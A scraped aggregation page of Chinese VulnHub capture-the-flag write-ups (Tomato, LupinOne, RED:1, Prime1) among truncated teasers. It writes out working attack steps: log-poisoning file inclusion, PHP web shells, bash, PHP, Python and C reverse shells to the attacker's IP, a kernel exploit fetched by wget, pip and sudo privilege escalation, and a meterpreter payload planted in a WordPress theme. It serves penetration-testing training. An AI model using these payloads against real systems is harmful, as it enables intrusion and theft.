-
2021-01-12 14:52:47
学习笔记下载
https://download.csdn.net/download/qq_41901122/14122059
解压密码20210112
环境搭建
下载地址:
https://www.vulnhub.com/entry/tomato-1,557/
kali 192.168.232.140
tomato: 192.168.232.175
win10 :192.168.232.171
第一部分 信息收集
第一步 扫描,发现主机
nmap -sP 192.168.232.0/24 arp-scan -l
第二步 扫描开放的端口
nmap -A -p- 192.168.232.175 nmap -sS -sV -p- -v 192.168.232.175
第三步 访问网站,查看网站信息,查看网站的源代码
http://192.168.232.175/
第二部分 漏洞查找
第一步 扫描目录
dirb http://192.168.232.175 python3 dirmap.py -i http://192.168.232.175 -lcf
---- Scanning URL: http://192.168.232.175/ ---- ==> DIRECTORY: http://192.168.232.175/antibot_image/ + http://192.168.232.175/index.html (CODE:200|SIZE:652) + http://192.168.232.175/server-status (CODE:403|SIZE:280)
第二步 访问目录,发现目录遍历漏洞
http://192.168.232.175/antibot_image/
第三步 查找可利用的文件
http://192.168.232.175/antibot_image/antibots/info.php 主要是查看注释
<html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> </head> <body> <!-- </?php include $_GET['image']; --> </body> </html>
第四步 利用文件包含漏洞
http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../etc/passwd
第五步 利用文件包含漏洞,查看日志文件
http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log
第三部分 漏洞利用
第一步 已知info.php文件存在文件包含漏洞,以及开放ssh端口,
尝试包含ssh认证日志文件/var/log/auth.log,并利用ssh认证用户名实现命令注入:(使用之前发现的2211端口是ssh,日志里面发现tomato用户,查看日志信息)
第二步 利用<?php system($_GET['cmd']);?>作为用户名进行php代码注入:
ssh '<?php system($_GET['cmd']);?>'@192.168.232.175 -p 2211 ssh '<?php system($_GET['cmd']);?>'@192.168.232.187 -p 2211
第三步 验证PHP代码是否注入成功
http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&cmd=ls
第二步 利用php,开启nc监听
nc -lvvp 666
第三步 反弹shell
php反弹shell代码:
hp -r '$sock=fsockopen("192.168.232.140",666);exec("/bin/sh -i <&3 >&3 2>&3");'
进行url编码后:
php+-r+%27%24sock%3dfsockopen(%22192.168.232.140%22%2c666)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27
触发反弹shell
http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&cmd=php+-r+%27%24sock%3dfsockopen(%22192.168.232.140%22%2c666)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27
第四步 开启交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
第四部分 提权
第一步 查看系统信息
uname -a whoami
第二步 下载提权脚本,执行,编译
使用CVE-2017-6074的poc git clone https://github.com/kkamagui/linux-kernel-exploits.git cd linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074 ./compile.sh
第三步 把exp上传到网站根目录,授予权限,并执行
cd /tmp wget http://192.168.232.129/CVE-2017-6074 chmod +x CVE-2017-6074 ./CVE-2017-6074
第四步 查找flag
cd /root ls cat proof.txt
摘抄
去靠近给你正能量的朋友圈。
谁也都知道,朋友对于性格形成的影响非常重大。
一个人的好坏,朋友熏染的力量要居大半。
每个人身旁有一个“圈子”,这圈子就是他所曾亲近的人围成的,
他跳来跳去,却跳不出这圈子。
在某一种圈子就成为某一种人。
古人说:“与善人交,如入芝兰之室,久而不闻其香;
与恶人交,如入鲍鱼之市,久而不闻其臭。”
一个人应该谨慎择友,择他所在的圈子,道理就在此。
出自《谈交友》作者丨朱光潜
更多相关内容 -
VulnHub
2021-02-10 03:55:32VulnHub par Zyrfex VulnHub que j'ai总站的历史机器: NUMERO 附件 MOIS NOM 尼维奥 2 2021年 02 1个 2021年 01 -
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
2021-01-09 09:22:32这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ... -
Vulnhub靶场题解
2018-08-24 17:17:10介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档 -
Vulnhub靶机系列:De-ICE: S1.120
2021-01-09 09:44:43靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用... -
vulnhub-Nagini.txt
2021-06-10 10:44:53Nagini -
Vulnhub篇Tomato.zip
2021-01-12 14:51:45主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。 -
Vulnhub靶场题解.html
2021-08-12 18:16:52Vulnhub靶场题解.,适合渗透测试人员学习交流 -
VulnHub-Tr0ll1.zip
2021-01-12 15:34:42VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习 -
VulnHub 靶机系列实战教程.pdf
2021-07-22 22:59:53VulnHub 靶机系列实战教程.pdf -
VulnHub靶场LupinOne
2022-02-01 21:51:08VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置. 一.信息...VulnHub靶场LupinOne
这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适
链接:https://pan.baidu.com/s/1lX79juqZJl4roKakTwWQxQ 提取码:8rcv
在这里,我把我遇到的问题一起分享给大家
直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置.
一.信息收集
信息收集是很重要的,举个栗子来说,比如约出自己的女神出来玩,肯定向了解女神的经济情况还有喜好嘛,通过她的微信朋友圈,她身边的好友,淘宝等等,了解一个人,就要从最贴近生活的方向开始,就像"只有千日做贼,那有千日防贼",感觉有点不太贴切,意思是差不多的,用这个只是想表达信息收集的重要性.
1.1寻找目标
在正常情况下,我们并不知道目标IP,在这里可以使用nmap进行扫描,Nmap具体是什么可以百度了解,这里不在多说.
我的kali所用IP:192.168.31.15(后面我的ip会变化,因为这不是再一个地方完成的,但是不影响参考)
nmap探测
命令:nmap 192.168.31.15/24
Nmap是一个很强大的工具,关于它的用法一定要好好掌握,上图中可以看到IP为’192.168.31.251’的就是靶机地址,详细扫描
靶机开发了22和80端口
默认就是访问80端口
检查出现一句话" Its an easy box, dont give up. “意思是"它是一个简单的盒子,不要放弃。”
至于22端口是ssh的,现在没有账号密码也无法使用
到这里,就可以进入下一个模块了
二.Web渗透
2.1目录遍历扫描
对于目录遍历,在一些大企业的网站,都有安全设备,对于目录遍历这样的操作,是会有告警的,最近一直在重保,这样的告警很多很多.
对于目录遍历,工具有很多,比如 御剑,gobuster,DirBuster及wwwscan等,而这些都是工具,在Github都能找到.最主要的还是字典.
在这里我使用gobuster进行目录遍历
我的字典位置
gobuster dir -w big.txt -u http://192.168.31.251
上面扫描的结果出来了,返回值200的时robots.txt文件试着访问~myfile这个文件夹,好家伙,页面就是404,下面还有一个注释的话“你可以的,继续努力。”
到这里似乎陷入僵局,猜测需要传参数
wfuzz -c -w discovery/predictable-filepaths/filename-dirname-bruteforce/upload_variants.txt -u http://192.168.43.36/~myfiles/?FUZZ=a
没用,继续目录扫描
wfuzz -c -w directory-list-2.3-big.txt -u http://192.168.43.36/~FUZZ |grep -v 404
过滤掉404
目前就出来一个,通过浏览器访问
这段文字包含信息很多,需要仔细阅读
私钥文件一般使用格式:txt、html、pub、cer、pem、der、key等等
这里爆破使用burp2021.21.1,截取数据报,隐藏文件格式就像这样的
设置位置以及字典
这里不得不提中文版的真舒服,第一个位置用这个字典,对了这字典在GitHub都能找到。这里就不多说了
第二个字典自己手动添加就行,文件后缀名,线程60
……我错了,中文版的执行爆破程序报错,英文版的没有问题,我这是第一次用这个版本,唉,bug还是太多了
既然出来了,就没有必要再往下跑了,访问这个文件(后面的我试了,没有其它文件了)
看着这像base64,试着转码一下,很明显,这个不是
这里推荐一个网站 链接: link. https://www.dcode.fr/identification-chiffrement
这个网站可以识别一些加密方式,Base58概率最大
可以看到,解码出来的结果就是一个证书
将其保存以下形式
2.2破解私钥爆破密码
之前做的时候,kali自带的python3.x,执行ss2john.py报错,这个是我其他系统配置的python2.7环境,可以正常执行这个脚本
这个就是生成的内容,发送到kali中,使用john爆破密码还记得上上面有段话吗,这个关键咱们现在用到了
关于john的用法可以百度,可以看它的帮助命令,很简单使用
john creck.txt --fork=4 fork --wordlist=/usr/share/wordlists/fasttrack.txt
密码出来了,P@55w0rd! ,密码出来了,用户名呢?难道是root,怎么可能呢,用户名就是icex64,上面那段文字给的
2.3登录
设置权限为600,私钥文件仅可自己读,但是,我这里登录不上去
可以通过XSHLL
输入后确定,也可修改密码,点击浏览-属性-修改密码,记住密码,登录即可
3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}
有个flag
三.提权
3.1提权到arsene
关于sudo的命令可以查看它的帮助
sudo -l #-l, --list 列出用户的权限或检查特定命令;
查看action文件内容,还有一个note.txt,没别的意思 ,就是要执行heist.py
好了,再次查看heist.py这个文件
这里引入webbrowser
查找webbrowser
locate webbrowser
编辑文件添加下面那句话,我这使用vi出问题.所以用的nano
执行id,成功提权到arsene
3.2提权到root_1
https://gtfobins.github.io/ #Linux提权
TF=$(mktemp -d) echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py sudo pip install $TF
flag:
3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}
结束
3.3提权到root_2
通过反弹shell方式连接
通过这种方式,会遇到权限问题,需要再"/home/icex64"目录下创建一个名为“setup.py”的文件,如果你这个时候,权限是arsene的权限,你是无法再这里创建的,需要再icex64权限下创建"setup.py"
vi setup.py #或者是nano setup.py
from setuptools import setup from setuptools.command.install import install import os, socket, subprocess class CustomInstall(install): def run(self): install.run(self) s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.10.131",4444)) #此处是kali ip地址 os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) setup(name='FakePip', version='0.0.1', description='Reverse shell', url='xx.xx.xx.xx', author='nathan', author_email='xx@xx', license='MIT', zip_safe=False, cmdclass={'install': CustomInstall})
如果,你没再icex64下面创建此脚本,
再执行此脚本前,需要再kali中执行监听,会报错
nc -lvvp 4444
再执行
sudo pip install . --upgrade
kali中显示
3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}
See you on the next heist.
好了,到这里差不多结束了
也可以再root命令下修改root密码
passwd root
当然了,也可以修改其他用户密码了
四.收获
实践是检验真理的唯一标准
-
VulnHub:VulnHub Box演练
2021-03-16 01:48:21VulnHub:VulnHub Box演练 -
vulnhub:本地搜索NVD
2021-05-09 17:41:22Vulnhub __ __ _ _ _ _ \ \ / / | | | | | | | | \ \ / /_ _ | | _ __ | |__| | _ _ | |__ \ \/ /| | | || || '_ \ | __ || | | || '_ \ \ / | |_| || || | | || | | || |_| || |_) | \/ \__,_||_||_| |_||_|... -
vulnhub靶场,RED: 1
2022-02-11 10:44:40vulnhub靶场,RED: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/red-1,753/ 攻击机:kali(192.168.109.128) 靶机:RED: 1(192.168.109.197) 下载好靶机之后直接使用VMware Workstation Pro虚拟机...vulnhub靶场,RED: 1
环境准备
靶机下载地址:https://www.vulnhub.com/entry/red-1,753/
攻击机:kali(192.168.109.128)
靶机:RED: 1(192.168.109.197)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式
目标:提升为root权限获取root目录下的flag信息收集
使用arp-scan确定目标靶机
确定目标靶机IP为192.168.109.197
使用nmap扫描查看目标靶机端口开放情况
开放端口:22、80
浏览器访问目标靶机80端口
域名自动跳转到redrocks.win
,说明存在域名重定向,进入配置文件/etc/hosts
进行配置
再次进行访问
页面提示说找不到他的后门,说明此网站肯定已经被植入了后门,查看一下源代码
这里有一段英文,意思就是说要向Mr. Miessler寻求帮助,也不知道是啥意思,在网上搜一下
发现其中指向了gitub上的一个字典,正好kali上也是自带这个字典的
尝试用其中的字典进行目录扫描gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -x .php -u http://redrocks.win/
发现一个NetworkFileManagerPHP.php
页面,进行访问,但是访问后发现是一片空白,说明确实存在这个页面,再根据状态码为500猜测这个页面可能存在LFI,使用wfuzz测试一下参数,字典也用github上面提供的字典文件wfuzz -c -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test' -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
使用key
参数测试一下LFI
确实存在文件包含漏洞渗透过程
尝试污染日志文件和远程包含均失败,使用
filter
协议查看NetworkFileManagerPHP.php
源码
将结果base64解码一下
里面又存在一段base64加密的密文,使用base64在进行一次解密
That password alone won’t help you! Hashcat says rules are rules
仅凭那个密码对您没有帮助! Hashcat 说规则就是规则
提到了密码、Hashcat 和规则。由于它是 base64 编码的,我们可以假设 Red 在谈论 Hashcat 的 Best64 规则为密码突变,想到的这里大概能获取 wp-config 文件,里面有数据库的密码:
经base64解码得<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'wordpress' ); /** MySQL database username */ define( 'DB_USER', 'john' ); /** MySQL database password */ define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); define('FS_METHOD', 'direct'); define('WP_SITEURL', 'http://redrocks.win'); define('WP_HOME', 'http://redrocks.win'); /**#@ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '2uuBvc8SO5{>UwQ<^5V5[UHBw%N}-BwWqw|><*HfBwJ( $&%,(Zbg/jwFkRHf~v|'); define('SECURE_AUTH_KEY', 'ah}<I`52GL6C^@~x C9FpMq-)txgOmA<~{R5ktY/@.]dBF?keB3} Y^u!a54 Xc('); define('LOGGED_IN_KEY', '[a!K}D<7-vB3Y&x_<3e]Wd J]!o A:U@QUZ-RU1]tO@/N}b}R@ /$ u*pJ|Z(xu-'); define('NONCE_KEY', ' g4|@~:h,K29D}$FL-f/eujw(VT;8wa7xRWpVR: >},]!Ez.48E:ok 8Ip~5_o a'); define('AUTH_SALT', 'a;,O<~vbpL |@W !Rs1o,T$r9(LwaXI =I7ZW$.Z[ BQ=B6QG7nr w_bQ6B]5q4c'); define('SECURE_AUTH_SALT', 'GkU:% Lo} 9}w38i:%]=uq&J6Z&RR#v2vsB5a_ .[us;6mE |$x* D*Ke :Nt:'); define('LOGGED_IN_SALT', '#`F9&pm_jY}N3y0&8Z]EeL)z,$39,yFc$Nq`jGOMT_aM*`<$9A:9<Kk^L}fX@ iZ'); define('NONCE_SALT', 'hTlFE*6zlZMbqluz)hf:-:x-:l89fC4otci;38|i`7eU1; k[!0[ZG.oCt2@-y3X'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
账号:john
密码:R3v_m4lwh3r3_k1nG!!
尝试使用这个账号密码进行ssh远程连接
连接失败,根据前面得hashcat,将密码保存到pass.txt文件使用hashcat规则进行破解hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt
使用hydra进行暴力破解hydra -l john -P passlist.txt ssh://192.168.109.197
使用john:R3v_m4lwh3r3_k1nG!!6
进行远程连接
连接成功权限提升
在当前目录下发现一个
note_from_red.txt
文件,查看其内容
这里发现好像将cat
和vi
命令的作用给互换了,这个文件给出得内容也是说的这个意思
查看sudo命令
发现ippsec用户在无密码的情况下可以执行/usr/bin/time
命令,在提权网站上查找提权方法
再次准备进行操作的时候发现ssh连接自动断掉了,而且再次进行连接发现密码也被修改了,只能再次破解一次
使用sudo -u ippsec /usr/bin/time /bin/bash
提权为ippsec用户
想进行下一步操作,发现shell又被断掉了
应该是这个靶机的设定,那再重复之前的操纵,在靶机上创建一个反弹shell的脚本
靶机上:cd /tmp cat shell.sh 内容为: #!/bin/bash bash -c 'bash -i >& /dev/tcp/192.168.109.128/4444 0>&1' 保存后退出 chmod +x shell.sh ./shell.sh
kali监听本地的4444端口即可
shell连接成功,升级一下shell1. 在 /tmp 目录中创建一个反向 shell bash 脚本 2. 在 kali 上运行 `nc -lvvp 4444` 和 执行 shell 脚本 3. `python3 -c 'import pty;pty.spawn("/bin/bash")'` 4. `export TERM=xterm` 然后 Ctrl+Z 退出来一下 5. `stty raw -echo;fg` 回车后输入 reset 再回车
即可得到一个不会断开的shell
做到这里,发现一个问题,就是命令行上总是会不时的弹出一些消息,肯定是设置什么定时任务,下载pspy64s监听
spy是一种命令行工具,无需root权限即可监听进程。可查看其他用户执行的命令,cron作业等https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
先在kali上下载好后搭建一个临时的http服务即可
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
python3 -m http.server 8000
靶机上:wget http://192.168.109.128:8000/pspy64s chmod +x pspy64s ./pspy64s
这里不知道怎么回事反弹回来的shell就一直有问题,就凑合看吧
这应该是他对系统的后门,查看一下这个 supersecretfileuc.c 文件
发现是定时弹出的脚本,所以只需要上传一个提权的脚本将此脚本进行替换即可
先删除/var/www/wordpress/.git/supersecretfileuc.c
和rev
文件
写入由c语言编写的反弹shell代码反弹shell代码: #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <stdlib.h> #include <unistd.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void){ int port = 4444; struct sockaddr_in revsockaddr; int sockt = socket(AF_INET, SOCK_STREAM, 0); revsockaddr.sin_family = AF_INET; revsockaddr.sin_port = htons(port); revsockaddr.sin_addr.s_addr = inet_addr("192.168.109.128"); connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr)); dup2(sockt, 0); dup2(sockt, 1); dup2(sockt, 2); char * const argv[] = {"/bin/bash", NULL}; execve("/bin/bash", argv, NULL); return 0; }
使用python搭建临时的http服务
python3 -m http.server 8000
靶机上:wget http://192.168.109.128:8000/supersecretfileuc.c
然后kali上监听4444端口,稍微等待一下,即可反弹回来一个权限为root的shell
在其root目录下获取最终的flag,靶机RED: 1渗透结束
-
vulnhub靶场-Prime1
2022-03-30 16:56:56练习靶场 prime:1 下载地址:https://download.vulnhub.com/prime/Prime_Series_Level-1.rar 目的是找到flag。要进入到系统目录中去找。 一. 网络的设置 我遇到的情况是NET模式下连接不成功,所以我进入的拯救...练习靶场 prime:1
下载地址:https://download.vulnhub.com/prime/Prime_Series_Level-1.rar
目的是找到flag。要进入到系统目录中去找。
一. 网络的设置
我遇到的情况是NET模式下连接不成功,所以我进入的拯救模式,将动态网络配置改成静态网络来进行的复现。其中具体的原因我还没弄清楚。但设置完静态网络后就能够正常复现了。
二 . 开始渗透
1. 检测IP和端口(nmap工具)
按照靶机的设定,在不知道具体的IP地址情况下对prime1靶机进行攻击,现在我的ip是静态的,我是知道IP的,但是这个不影响复现,还是先进行对IP地址的扫描。在kali系统中用nmap工具进行操作:
namp -sP 192.168.96.96.0/24 // -sP参数是 使用ping命令来扫描主机,发现主机的。
nmap -P 192.168.96.221 //-P 是扫描该主机中的port端口,没扫出来换参数。
nmap -A -o -sV 192.168.96.221 //-A综合扫描,-o主机系统 ,-vS 版本扫描
2. 目录扫描(dirb工具)
前面扫描到了IP和端口,查看到22端口和80端口是开放的,尝试看看网站能否访问,是可以访问的,但是没有地方可以输入,进行下一步尝试。
所以进行目录扫描开是否有可以利用的目录,这里用到kali中dirb工具:
命令:dirb http://192.168.96.221/ //这个扫描有太多的目录,所以进行过滤。这里看到wordpress,一个开源的CMS(内容管理系统)
命令:dirb http://192.168.96.221 -X .txt,.php,.zip //-X是 在字典后加上后缀
得出的三个目录挨个访问一下,用kali中的curl来访问),有一个有用的信息location.txt,先记录下来。
其中两个php文件我们就要考虑到是否有参数可以利用?
三. 扫描参数(fuzz工具)
利用dirb扫描出的php文件,看看是否可以得到信息。
命令: wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.96.221/index.php?FUZZ
这里得到信息有很多,我们能要进行筛选有用的,可以从word字节数来筛选(ps:也可用其他的条件筛选)这里用到参数 “--hw 12 ”。就筛选出来file
带入访问:
看到提示digginf wrong file ,这像是文件包含,先尝试一下。就用前面的location.txt,得到了下一步的提示,use ‘secrettier360' parameter on some other page..。
用这个提示访问。
利用文件包含获取信息,/etc/passwd
在倒数第二行中可以看到 /home/saket/password.txt,这可能存放着密码信息。follow_the_ippsec
这里找到了密码,去系统登录页面去登录发现不能登录。在开放的端口去尝试数据库的登录也不行。这里就要想到在dirb工具扫描时有wordpress。看看能否从中突破?
四. wordpress的渗透
登录它的后台登录页面:http://192.168.96.221/wordpress/wp-admin/user/admin.php
但是缺少用户名,着就要用到cmseek工具,可以枚举用户名。
cmseek -u http://192.168.96.221/wordpress/
没有扫描出来用户名,换另一个工具:wpscan
wpscan --url http://192.168.96.221/wordpress/ --enumerate u //参数 --url 域名 ,--enumerate 枚举用户名
可以得到用户名:victor。
这里进入到worpress的后台,并且还是通过最高权限的用户victor登录的。在wordpress中我们可以通过扫描器直接去扫描,这里我们用wordpress的一个可以上传代码的地方去突破。在Appearance中的Theme Editor找到一个可以保存代码的地方。
在找到这个地方一阵幸喜,因为我们可以通过它上传一句话木马来获取权限,但是考虑到一句话木马很可能被WAF干掉,我们换一种方式 用反弹连接,反弹连接我们可以通过GitHub上搜索一个,也可以通过kali中的工具msfconsole,它是一个强大的渗透工具,现在讲一讲使用它来建立的反弹连接。
生成payload,用msfconsole的一个模块:
命令 msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.96.226 lport=7777 -o shell.php
上面命令中-p 载荷payload -o 输出到指定文件 lhost 攻击机的ip lport 端口
将shell.php中的payload复制到wordpress中,上传。同时我们还要知道上传的文件路径。
将payload上传了,在kali中进入msfconsole,
开启监听:use exploit/multi/handler,
开始输入设置的,set payload php/meterpreter/revere.php
在输入 set lhost 192.168.96.221
再输入 set lport 7777
最后输入 exploit
输入完成后如果参数都正确,开启监听,访问 http://192.168.96.221/wordpress/wp-content/themes/twentynineteen/secret.php(这就是payload的上传路径) 之后就能监听,并建立一个对话。
建立的对话可以查到靶机的版本——用命令:sysinfo
知道了靶机的版本,通过kali中的工具msfconsole查到一些系统的漏洞,并且有可利用的c文件。
我们用xshell再连接一个kali,打开msfconsole,输入命令 :searchsploit 16.04 Ubuntu 在里面找到对应版本的漏洞信息。
我们再在xshell中启一个kali,把.c文件复制到当前用户目录下,并且编译输出一个可执行文件45010
完成上面的步骤后我们在建立的反弹连接的对话上上传编译的文件
上传的45010文件传到tmp目录下是该目录下可读写。我们在查看一些文件是否上传了,并且看看是否可执行,如果不能执行我们提升权限。
上面看到45010文件不能执行,我们知道提升权限的命令chmod +x。
提升权限后执行该文件 ./45010 执行后我们就可以在文件目录中找需要的文件。
PS 有些情况我们下载的靶机的版本并不是Ubuntu4.10而是Ubuntu 4.15,就不能通过45010这个复现成功。
新人发帖,欢迎指出不足,虚心接受
-
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含...
2021-05-28 22:51:23Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并... -
vulnhub靶场——DarkHole 1
2022-02-17 18:53:07vulnhub靶场——DarkHole 1 WriteUp -
vulnhub靶机Funbox10
2022-04-07 09:13:51vulnhub靶机Funbox10 首先我们使用kali扫描地址 然后我们对靶机地址进行端口扫描 然后我们访问80端口看下 然后我们使用dirb扫描网站目录、然后我们访问这四个目录看下 只有catalog可以访问,那我们重点就看... -
VulnHub | Red:1
2021-12-19 20:21:17http://www.vulnhub.com/entry/red-1,753/ 难度:Medium 测试环境 攻击机:Kali 192.168.56.109 目标靶机:Ubuntu 192.168.56.113 测试过程 信息收集 查找靶机IParp-scan -I eth1 -l,获取到目标IP为192.168.56.113... -
vulnhub之DC3.2靶机
2022-02-16 20:58:24目录介绍信息收集主机发现主机信息探测访问网站漏洞发现Sqlmap注入挂马提权 介绍 系列: DC(此系列共10台) 发布日期:2020年4月25日 难度:初级-中级 ...对于VulnHub靶机来说,出现“PCS Systemtec -
渗透练习 Vulnhub靶场 Nemesis
2022-02-15 21:24:36https://www.vulnhub.com/entry/ia-nemesis-101,582/ 靶场: VulnHub.com 靶机名称: IA: Nemesis (1.0.1) 难度: 中等-困难 发布时间: 2020年10月25日 提示信息: 这个盒子是为了提高Linux特权升级和CMS技能而创建的... -
vulnhub sar 靶场练习
2021-09-07 15:33:08这次练习的靶机是vulnhub平台下的sar,该靶机是一个类似oscp的虚拟机,目的是提高并巩固渗透测试的知识点。下载地址为https://www.vulnhub.com/entry/sar-1,425/。这个靶机中没有出现新的知识点,难度相对比较简单。... -
VulnHub-driftingblues:9
2021-06-14 17:12:50目录 简介 信息收集 漏洞发现与利用 权限提升 clapton用户Shell 缓冲区溢出 root用户Shell 总结 简介 靶机地址:http://www.vulnhub.com/entry/driftingblues-9-final,695/ 该靶机总的来说和作者描述的一样,是简单... -
Vulnhub-Zico2靶机实战
2022-03-24 10:48:56Vulnhub-Zico2靶机实战 -
vulnhub之DC8靶机
2022-02-15 14:39:47exim4提权 靶机地址:https://www.vulnhub.com/entry/dc-8,367/ 从靶场得到提示信息: 靶机更适用Virtualbox 信息收集 主机发现 netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机... -
Vulnhub-thales靶机
2021-12-03 09:17:42thales下载地址https://download.vulnhub.com/thales/Thales.zip1.导入virtual box,网络改为桥接模式,打开虚拟机。 2.nmap扫描一下端口: 开放了8080端口和22端口。 3.浏览器打开8080端口: 服务是tomcat,... -
Vulnhub篇potato.zip
2021-01-12 17:54:53Vulnhub篇potato靶机,靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的过程文档,供大家参考学习 -
Vulnhub_Nivek
2021-08-30 00:46:33下方查看历史文章 VulnHub之DC-1 VulnHub之DC-2 VulnHub之DC-3 VulnHub之DC-4 VulnHub之MuzzyBox 【工具分享】AWVS 12 汉化破解版 通达OA任意上传&文件包含漏洞复现 扫描二维码 获取更多精彩 NowSec -
Vulnhub之mrRobot
2021-04-07 16:10:32Vulnhub是一个很好的靶机平台,想看官网点这里 今天学习mrRobot,点击这里下载哦~ 这个比较简单,入门学习… VMware和VirtualBox都可以导入 成功后如图: 这里启用NAT模式 攻击机 kali 192.168.81.140 靶机:192.... -
vulnhub靶场——CORROSION:2
2022-02-16 18:17:11vulnhub靶场——CORROSION:2 Wirteup